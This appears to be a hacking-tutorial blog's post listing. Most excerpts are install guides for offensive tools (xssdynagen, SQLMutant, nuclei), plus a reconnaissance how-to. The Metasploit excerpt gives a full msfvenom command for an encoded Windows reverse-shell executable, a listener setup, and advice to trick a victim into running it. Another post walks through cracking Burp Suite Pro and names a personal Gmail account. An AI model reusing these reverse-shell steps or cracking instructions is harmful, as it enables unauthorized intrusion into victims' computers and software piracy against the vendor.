
Posts

Installation of xssdynagen tool

Link to the repo: https://github.com/Cybersecurity-Ethical-Hacker/xssdynagen?tab=readme-ov-file

    git clone https://github.com/Cybersecurity-Ethical-Hacker/xssdynagen.git
    cd xssdynagen

The following 4 packages are needed for this tool to work and are already installed in Kali.

    pipx install aiohttp
    pipx install colorama
    pipx install tqdm
    pipx install "uvloop>=0.17.0"

You can always check the package existence:

    dpkg -l | grep packagename

If not installed then use this command:

    pip/pip3 install -r requirements.txt

If that also does not work then:

    apt install python3-aiohttp
    apt install python3-colorama
    apt install python3-tqdm
    apt install python3-uvloop

In Kali you need to install paramspider:

    apt install paramspider -y
    paramspider -d example.com   (Though this command in Kali does not work)

For Ubuntu:

    git clone https://github.com/0xKayala/ParamSpider
    cd ParamSpider
    pip/pip3 install -r requirements.txt

(If giving error then install the packages in above mentioned w...
Recent posts

Installation of SQLMutant tool

This tool works perfectly on an Ubuntu 24 system, and I found it is not working properly in the Kali Linux 24 version.

https://github.com/blackhatethicalhacking/SQLMutant/tree/main

This tool needs to be used along with the sqlmap tool. This cheat sheet is for Kali or Debian-based systems. The tool analyzes everything and gives you the vulnerable URL where SQL injection is possible. You then just need to use sqlmap to exploit that.

Prerequisite:

    apt install pipx -y   (for Ubuntu)
    pip3 install uro   or   pipx install uro
    pipx ensurepath
    pipx completions   (not needed)
    source ~/.bashrc   (or restart the system)

If the go tool is not installed, then run the below two commands first (golang-go) or follow this link to install go (https://mahimfiroj.blogspot.com/2024/12/installing-nuclei-in-kali.html); otherwise skip this step.

    dpkg -l | grep packagename   (Using this command you can check whether a package is installed or not)
    apt install gccgo-go -y or apt install gol...

Burpsuite install and crack in kali debian ubuntu

  Cracking burpsuite in kali: https://drive.google.com/drive/folders/13WQeT99kyyeWOmKGRKnjTKzCJmkrKdUa (This is not shared link. Log in to ovi.it88 gmail id and then click on the link) Follow step by step procedure...... Download the tool from the above link. Place the tool in /tmp folder or in any folder where you have permission in kali. The tool is under this folder  burpsuite_pro_v2024.5 for linux. Go to that /tmp/burpsuite_pro_v2024.5 for linux folder Open command prompt meaning terminal there and run this command: java -jar burploader.jar A pop-up window will appear. Another pop up window called license agreement will appear. Uncheck the condition and click I Accept . Now you have two windows.  From the loader window, copy the License key .  Paste that on the Enter license key window and click Next.  Check the "Use proxy server to connect" and click on Manual activation .  Now click Copy request under Manual Activation window.  Paste it ...

WSL - windows subsystem for linux

1. From the Start menu, type "Turn Windows features on or off". Check the boxes Virtual Machine Platform and Windows Subsystem for Linux, or simply give this command in the command prompt:

    wsl.exe --install --no-distribution

Now restart the system. If WSL is already installed, then give this command:

    wsl.exe --update

2. Now download Kali Linux from the Microsoft Store and install it. Or you can give this command to see the list of distributions, then install based on your choice.

To see the list of distributions:

    wsl.exe --list --online

To install:

    wsl.exe --install --distribution <Distro Name>

i.e.

    wsl --install --distribution kali-linux

3. Now it will ask for a username and password, say at the time of installing kali-linux here. Provide that.

4. Once it is installed, it comes with a very minimal package installation. Run the following commands to install all packages:

    sudo apt update
    sudo apt full-upgrade -y
    sudo apt install -y kali-linux-default

(This re...

Metasploit in action

Metasploit: Malicious executable creation:

Command:

    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp lhost=192.168.2.120 lport=4343 -b '\x00' -e x86/shikata_ga_nai -f exe -o shell.exe

Now you need to transfer this exe to the victim. The victim needs to click on this to initiate the reverse shell. Before that, on your attacking machine you need to listen for a connection so that the reverse shell from the victim can connect to you easily.

Type msfconsole in your Kali shell. Type the following commands one by one beside msf6>

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.2.120        (This is your attack machine IP)
    set lport 4343
    run

Now trick or manipulate the victim to click on that shell.exe. You will get a meterpreter shell like this.

    Meterpreter session 1 opened (192.168.2.120:4343 -> 192.168.2.252:49266) at 2017-09-06 17:04:07 +0000
    meterpreter>

Now if the user who clicked on the shell.exe...

Installing nuclei and go tool in kali

First you need to install go: https://go.dev/doc/install

You need to download this go tool, go1.23.4.linux-amd64.tar.gz, by clicking the Download button. Say you are root and downloaded the tool into your Downloads directory. Now run the below command:

    tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz

(If this command fails, then you need to move this tool to the /usr/local folder and then run this command: tar -xzf go1.23.4.linux-amd64.tar.gz)

Now add /usr/local/go/bin to the PATH environment variable. You can do this by adding the following line to your $HOME/.profile or /etc/profile (for a system-wide installation):

    export PATH=$PATH:/usr/local/go/bin

Now use the following command for immediate effect. This saves you from logging off and then logging back in:

    source $HOME/.profile
    go version   (to check it is installed successfully)

Install nuclei:

    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    apt install nuclei
    nuclei -u https://www.domain.com

Avi

Finding public ip address prefix of any organizations

First do an nslookup to find out the public IP address of the org.

    nslookup sslwireless.com

Now copy the public IP address and go to the following link.

https://whatismyipaddress.com

Paste the copied IP address there to find out its ASN number. Copy that ASN number.

Now go to this link:

https://bgp.he.net

In the search box, paste the ASN number and click search. Then go to the Prefixes v4 tab to see the public IP block of that organization.

Avi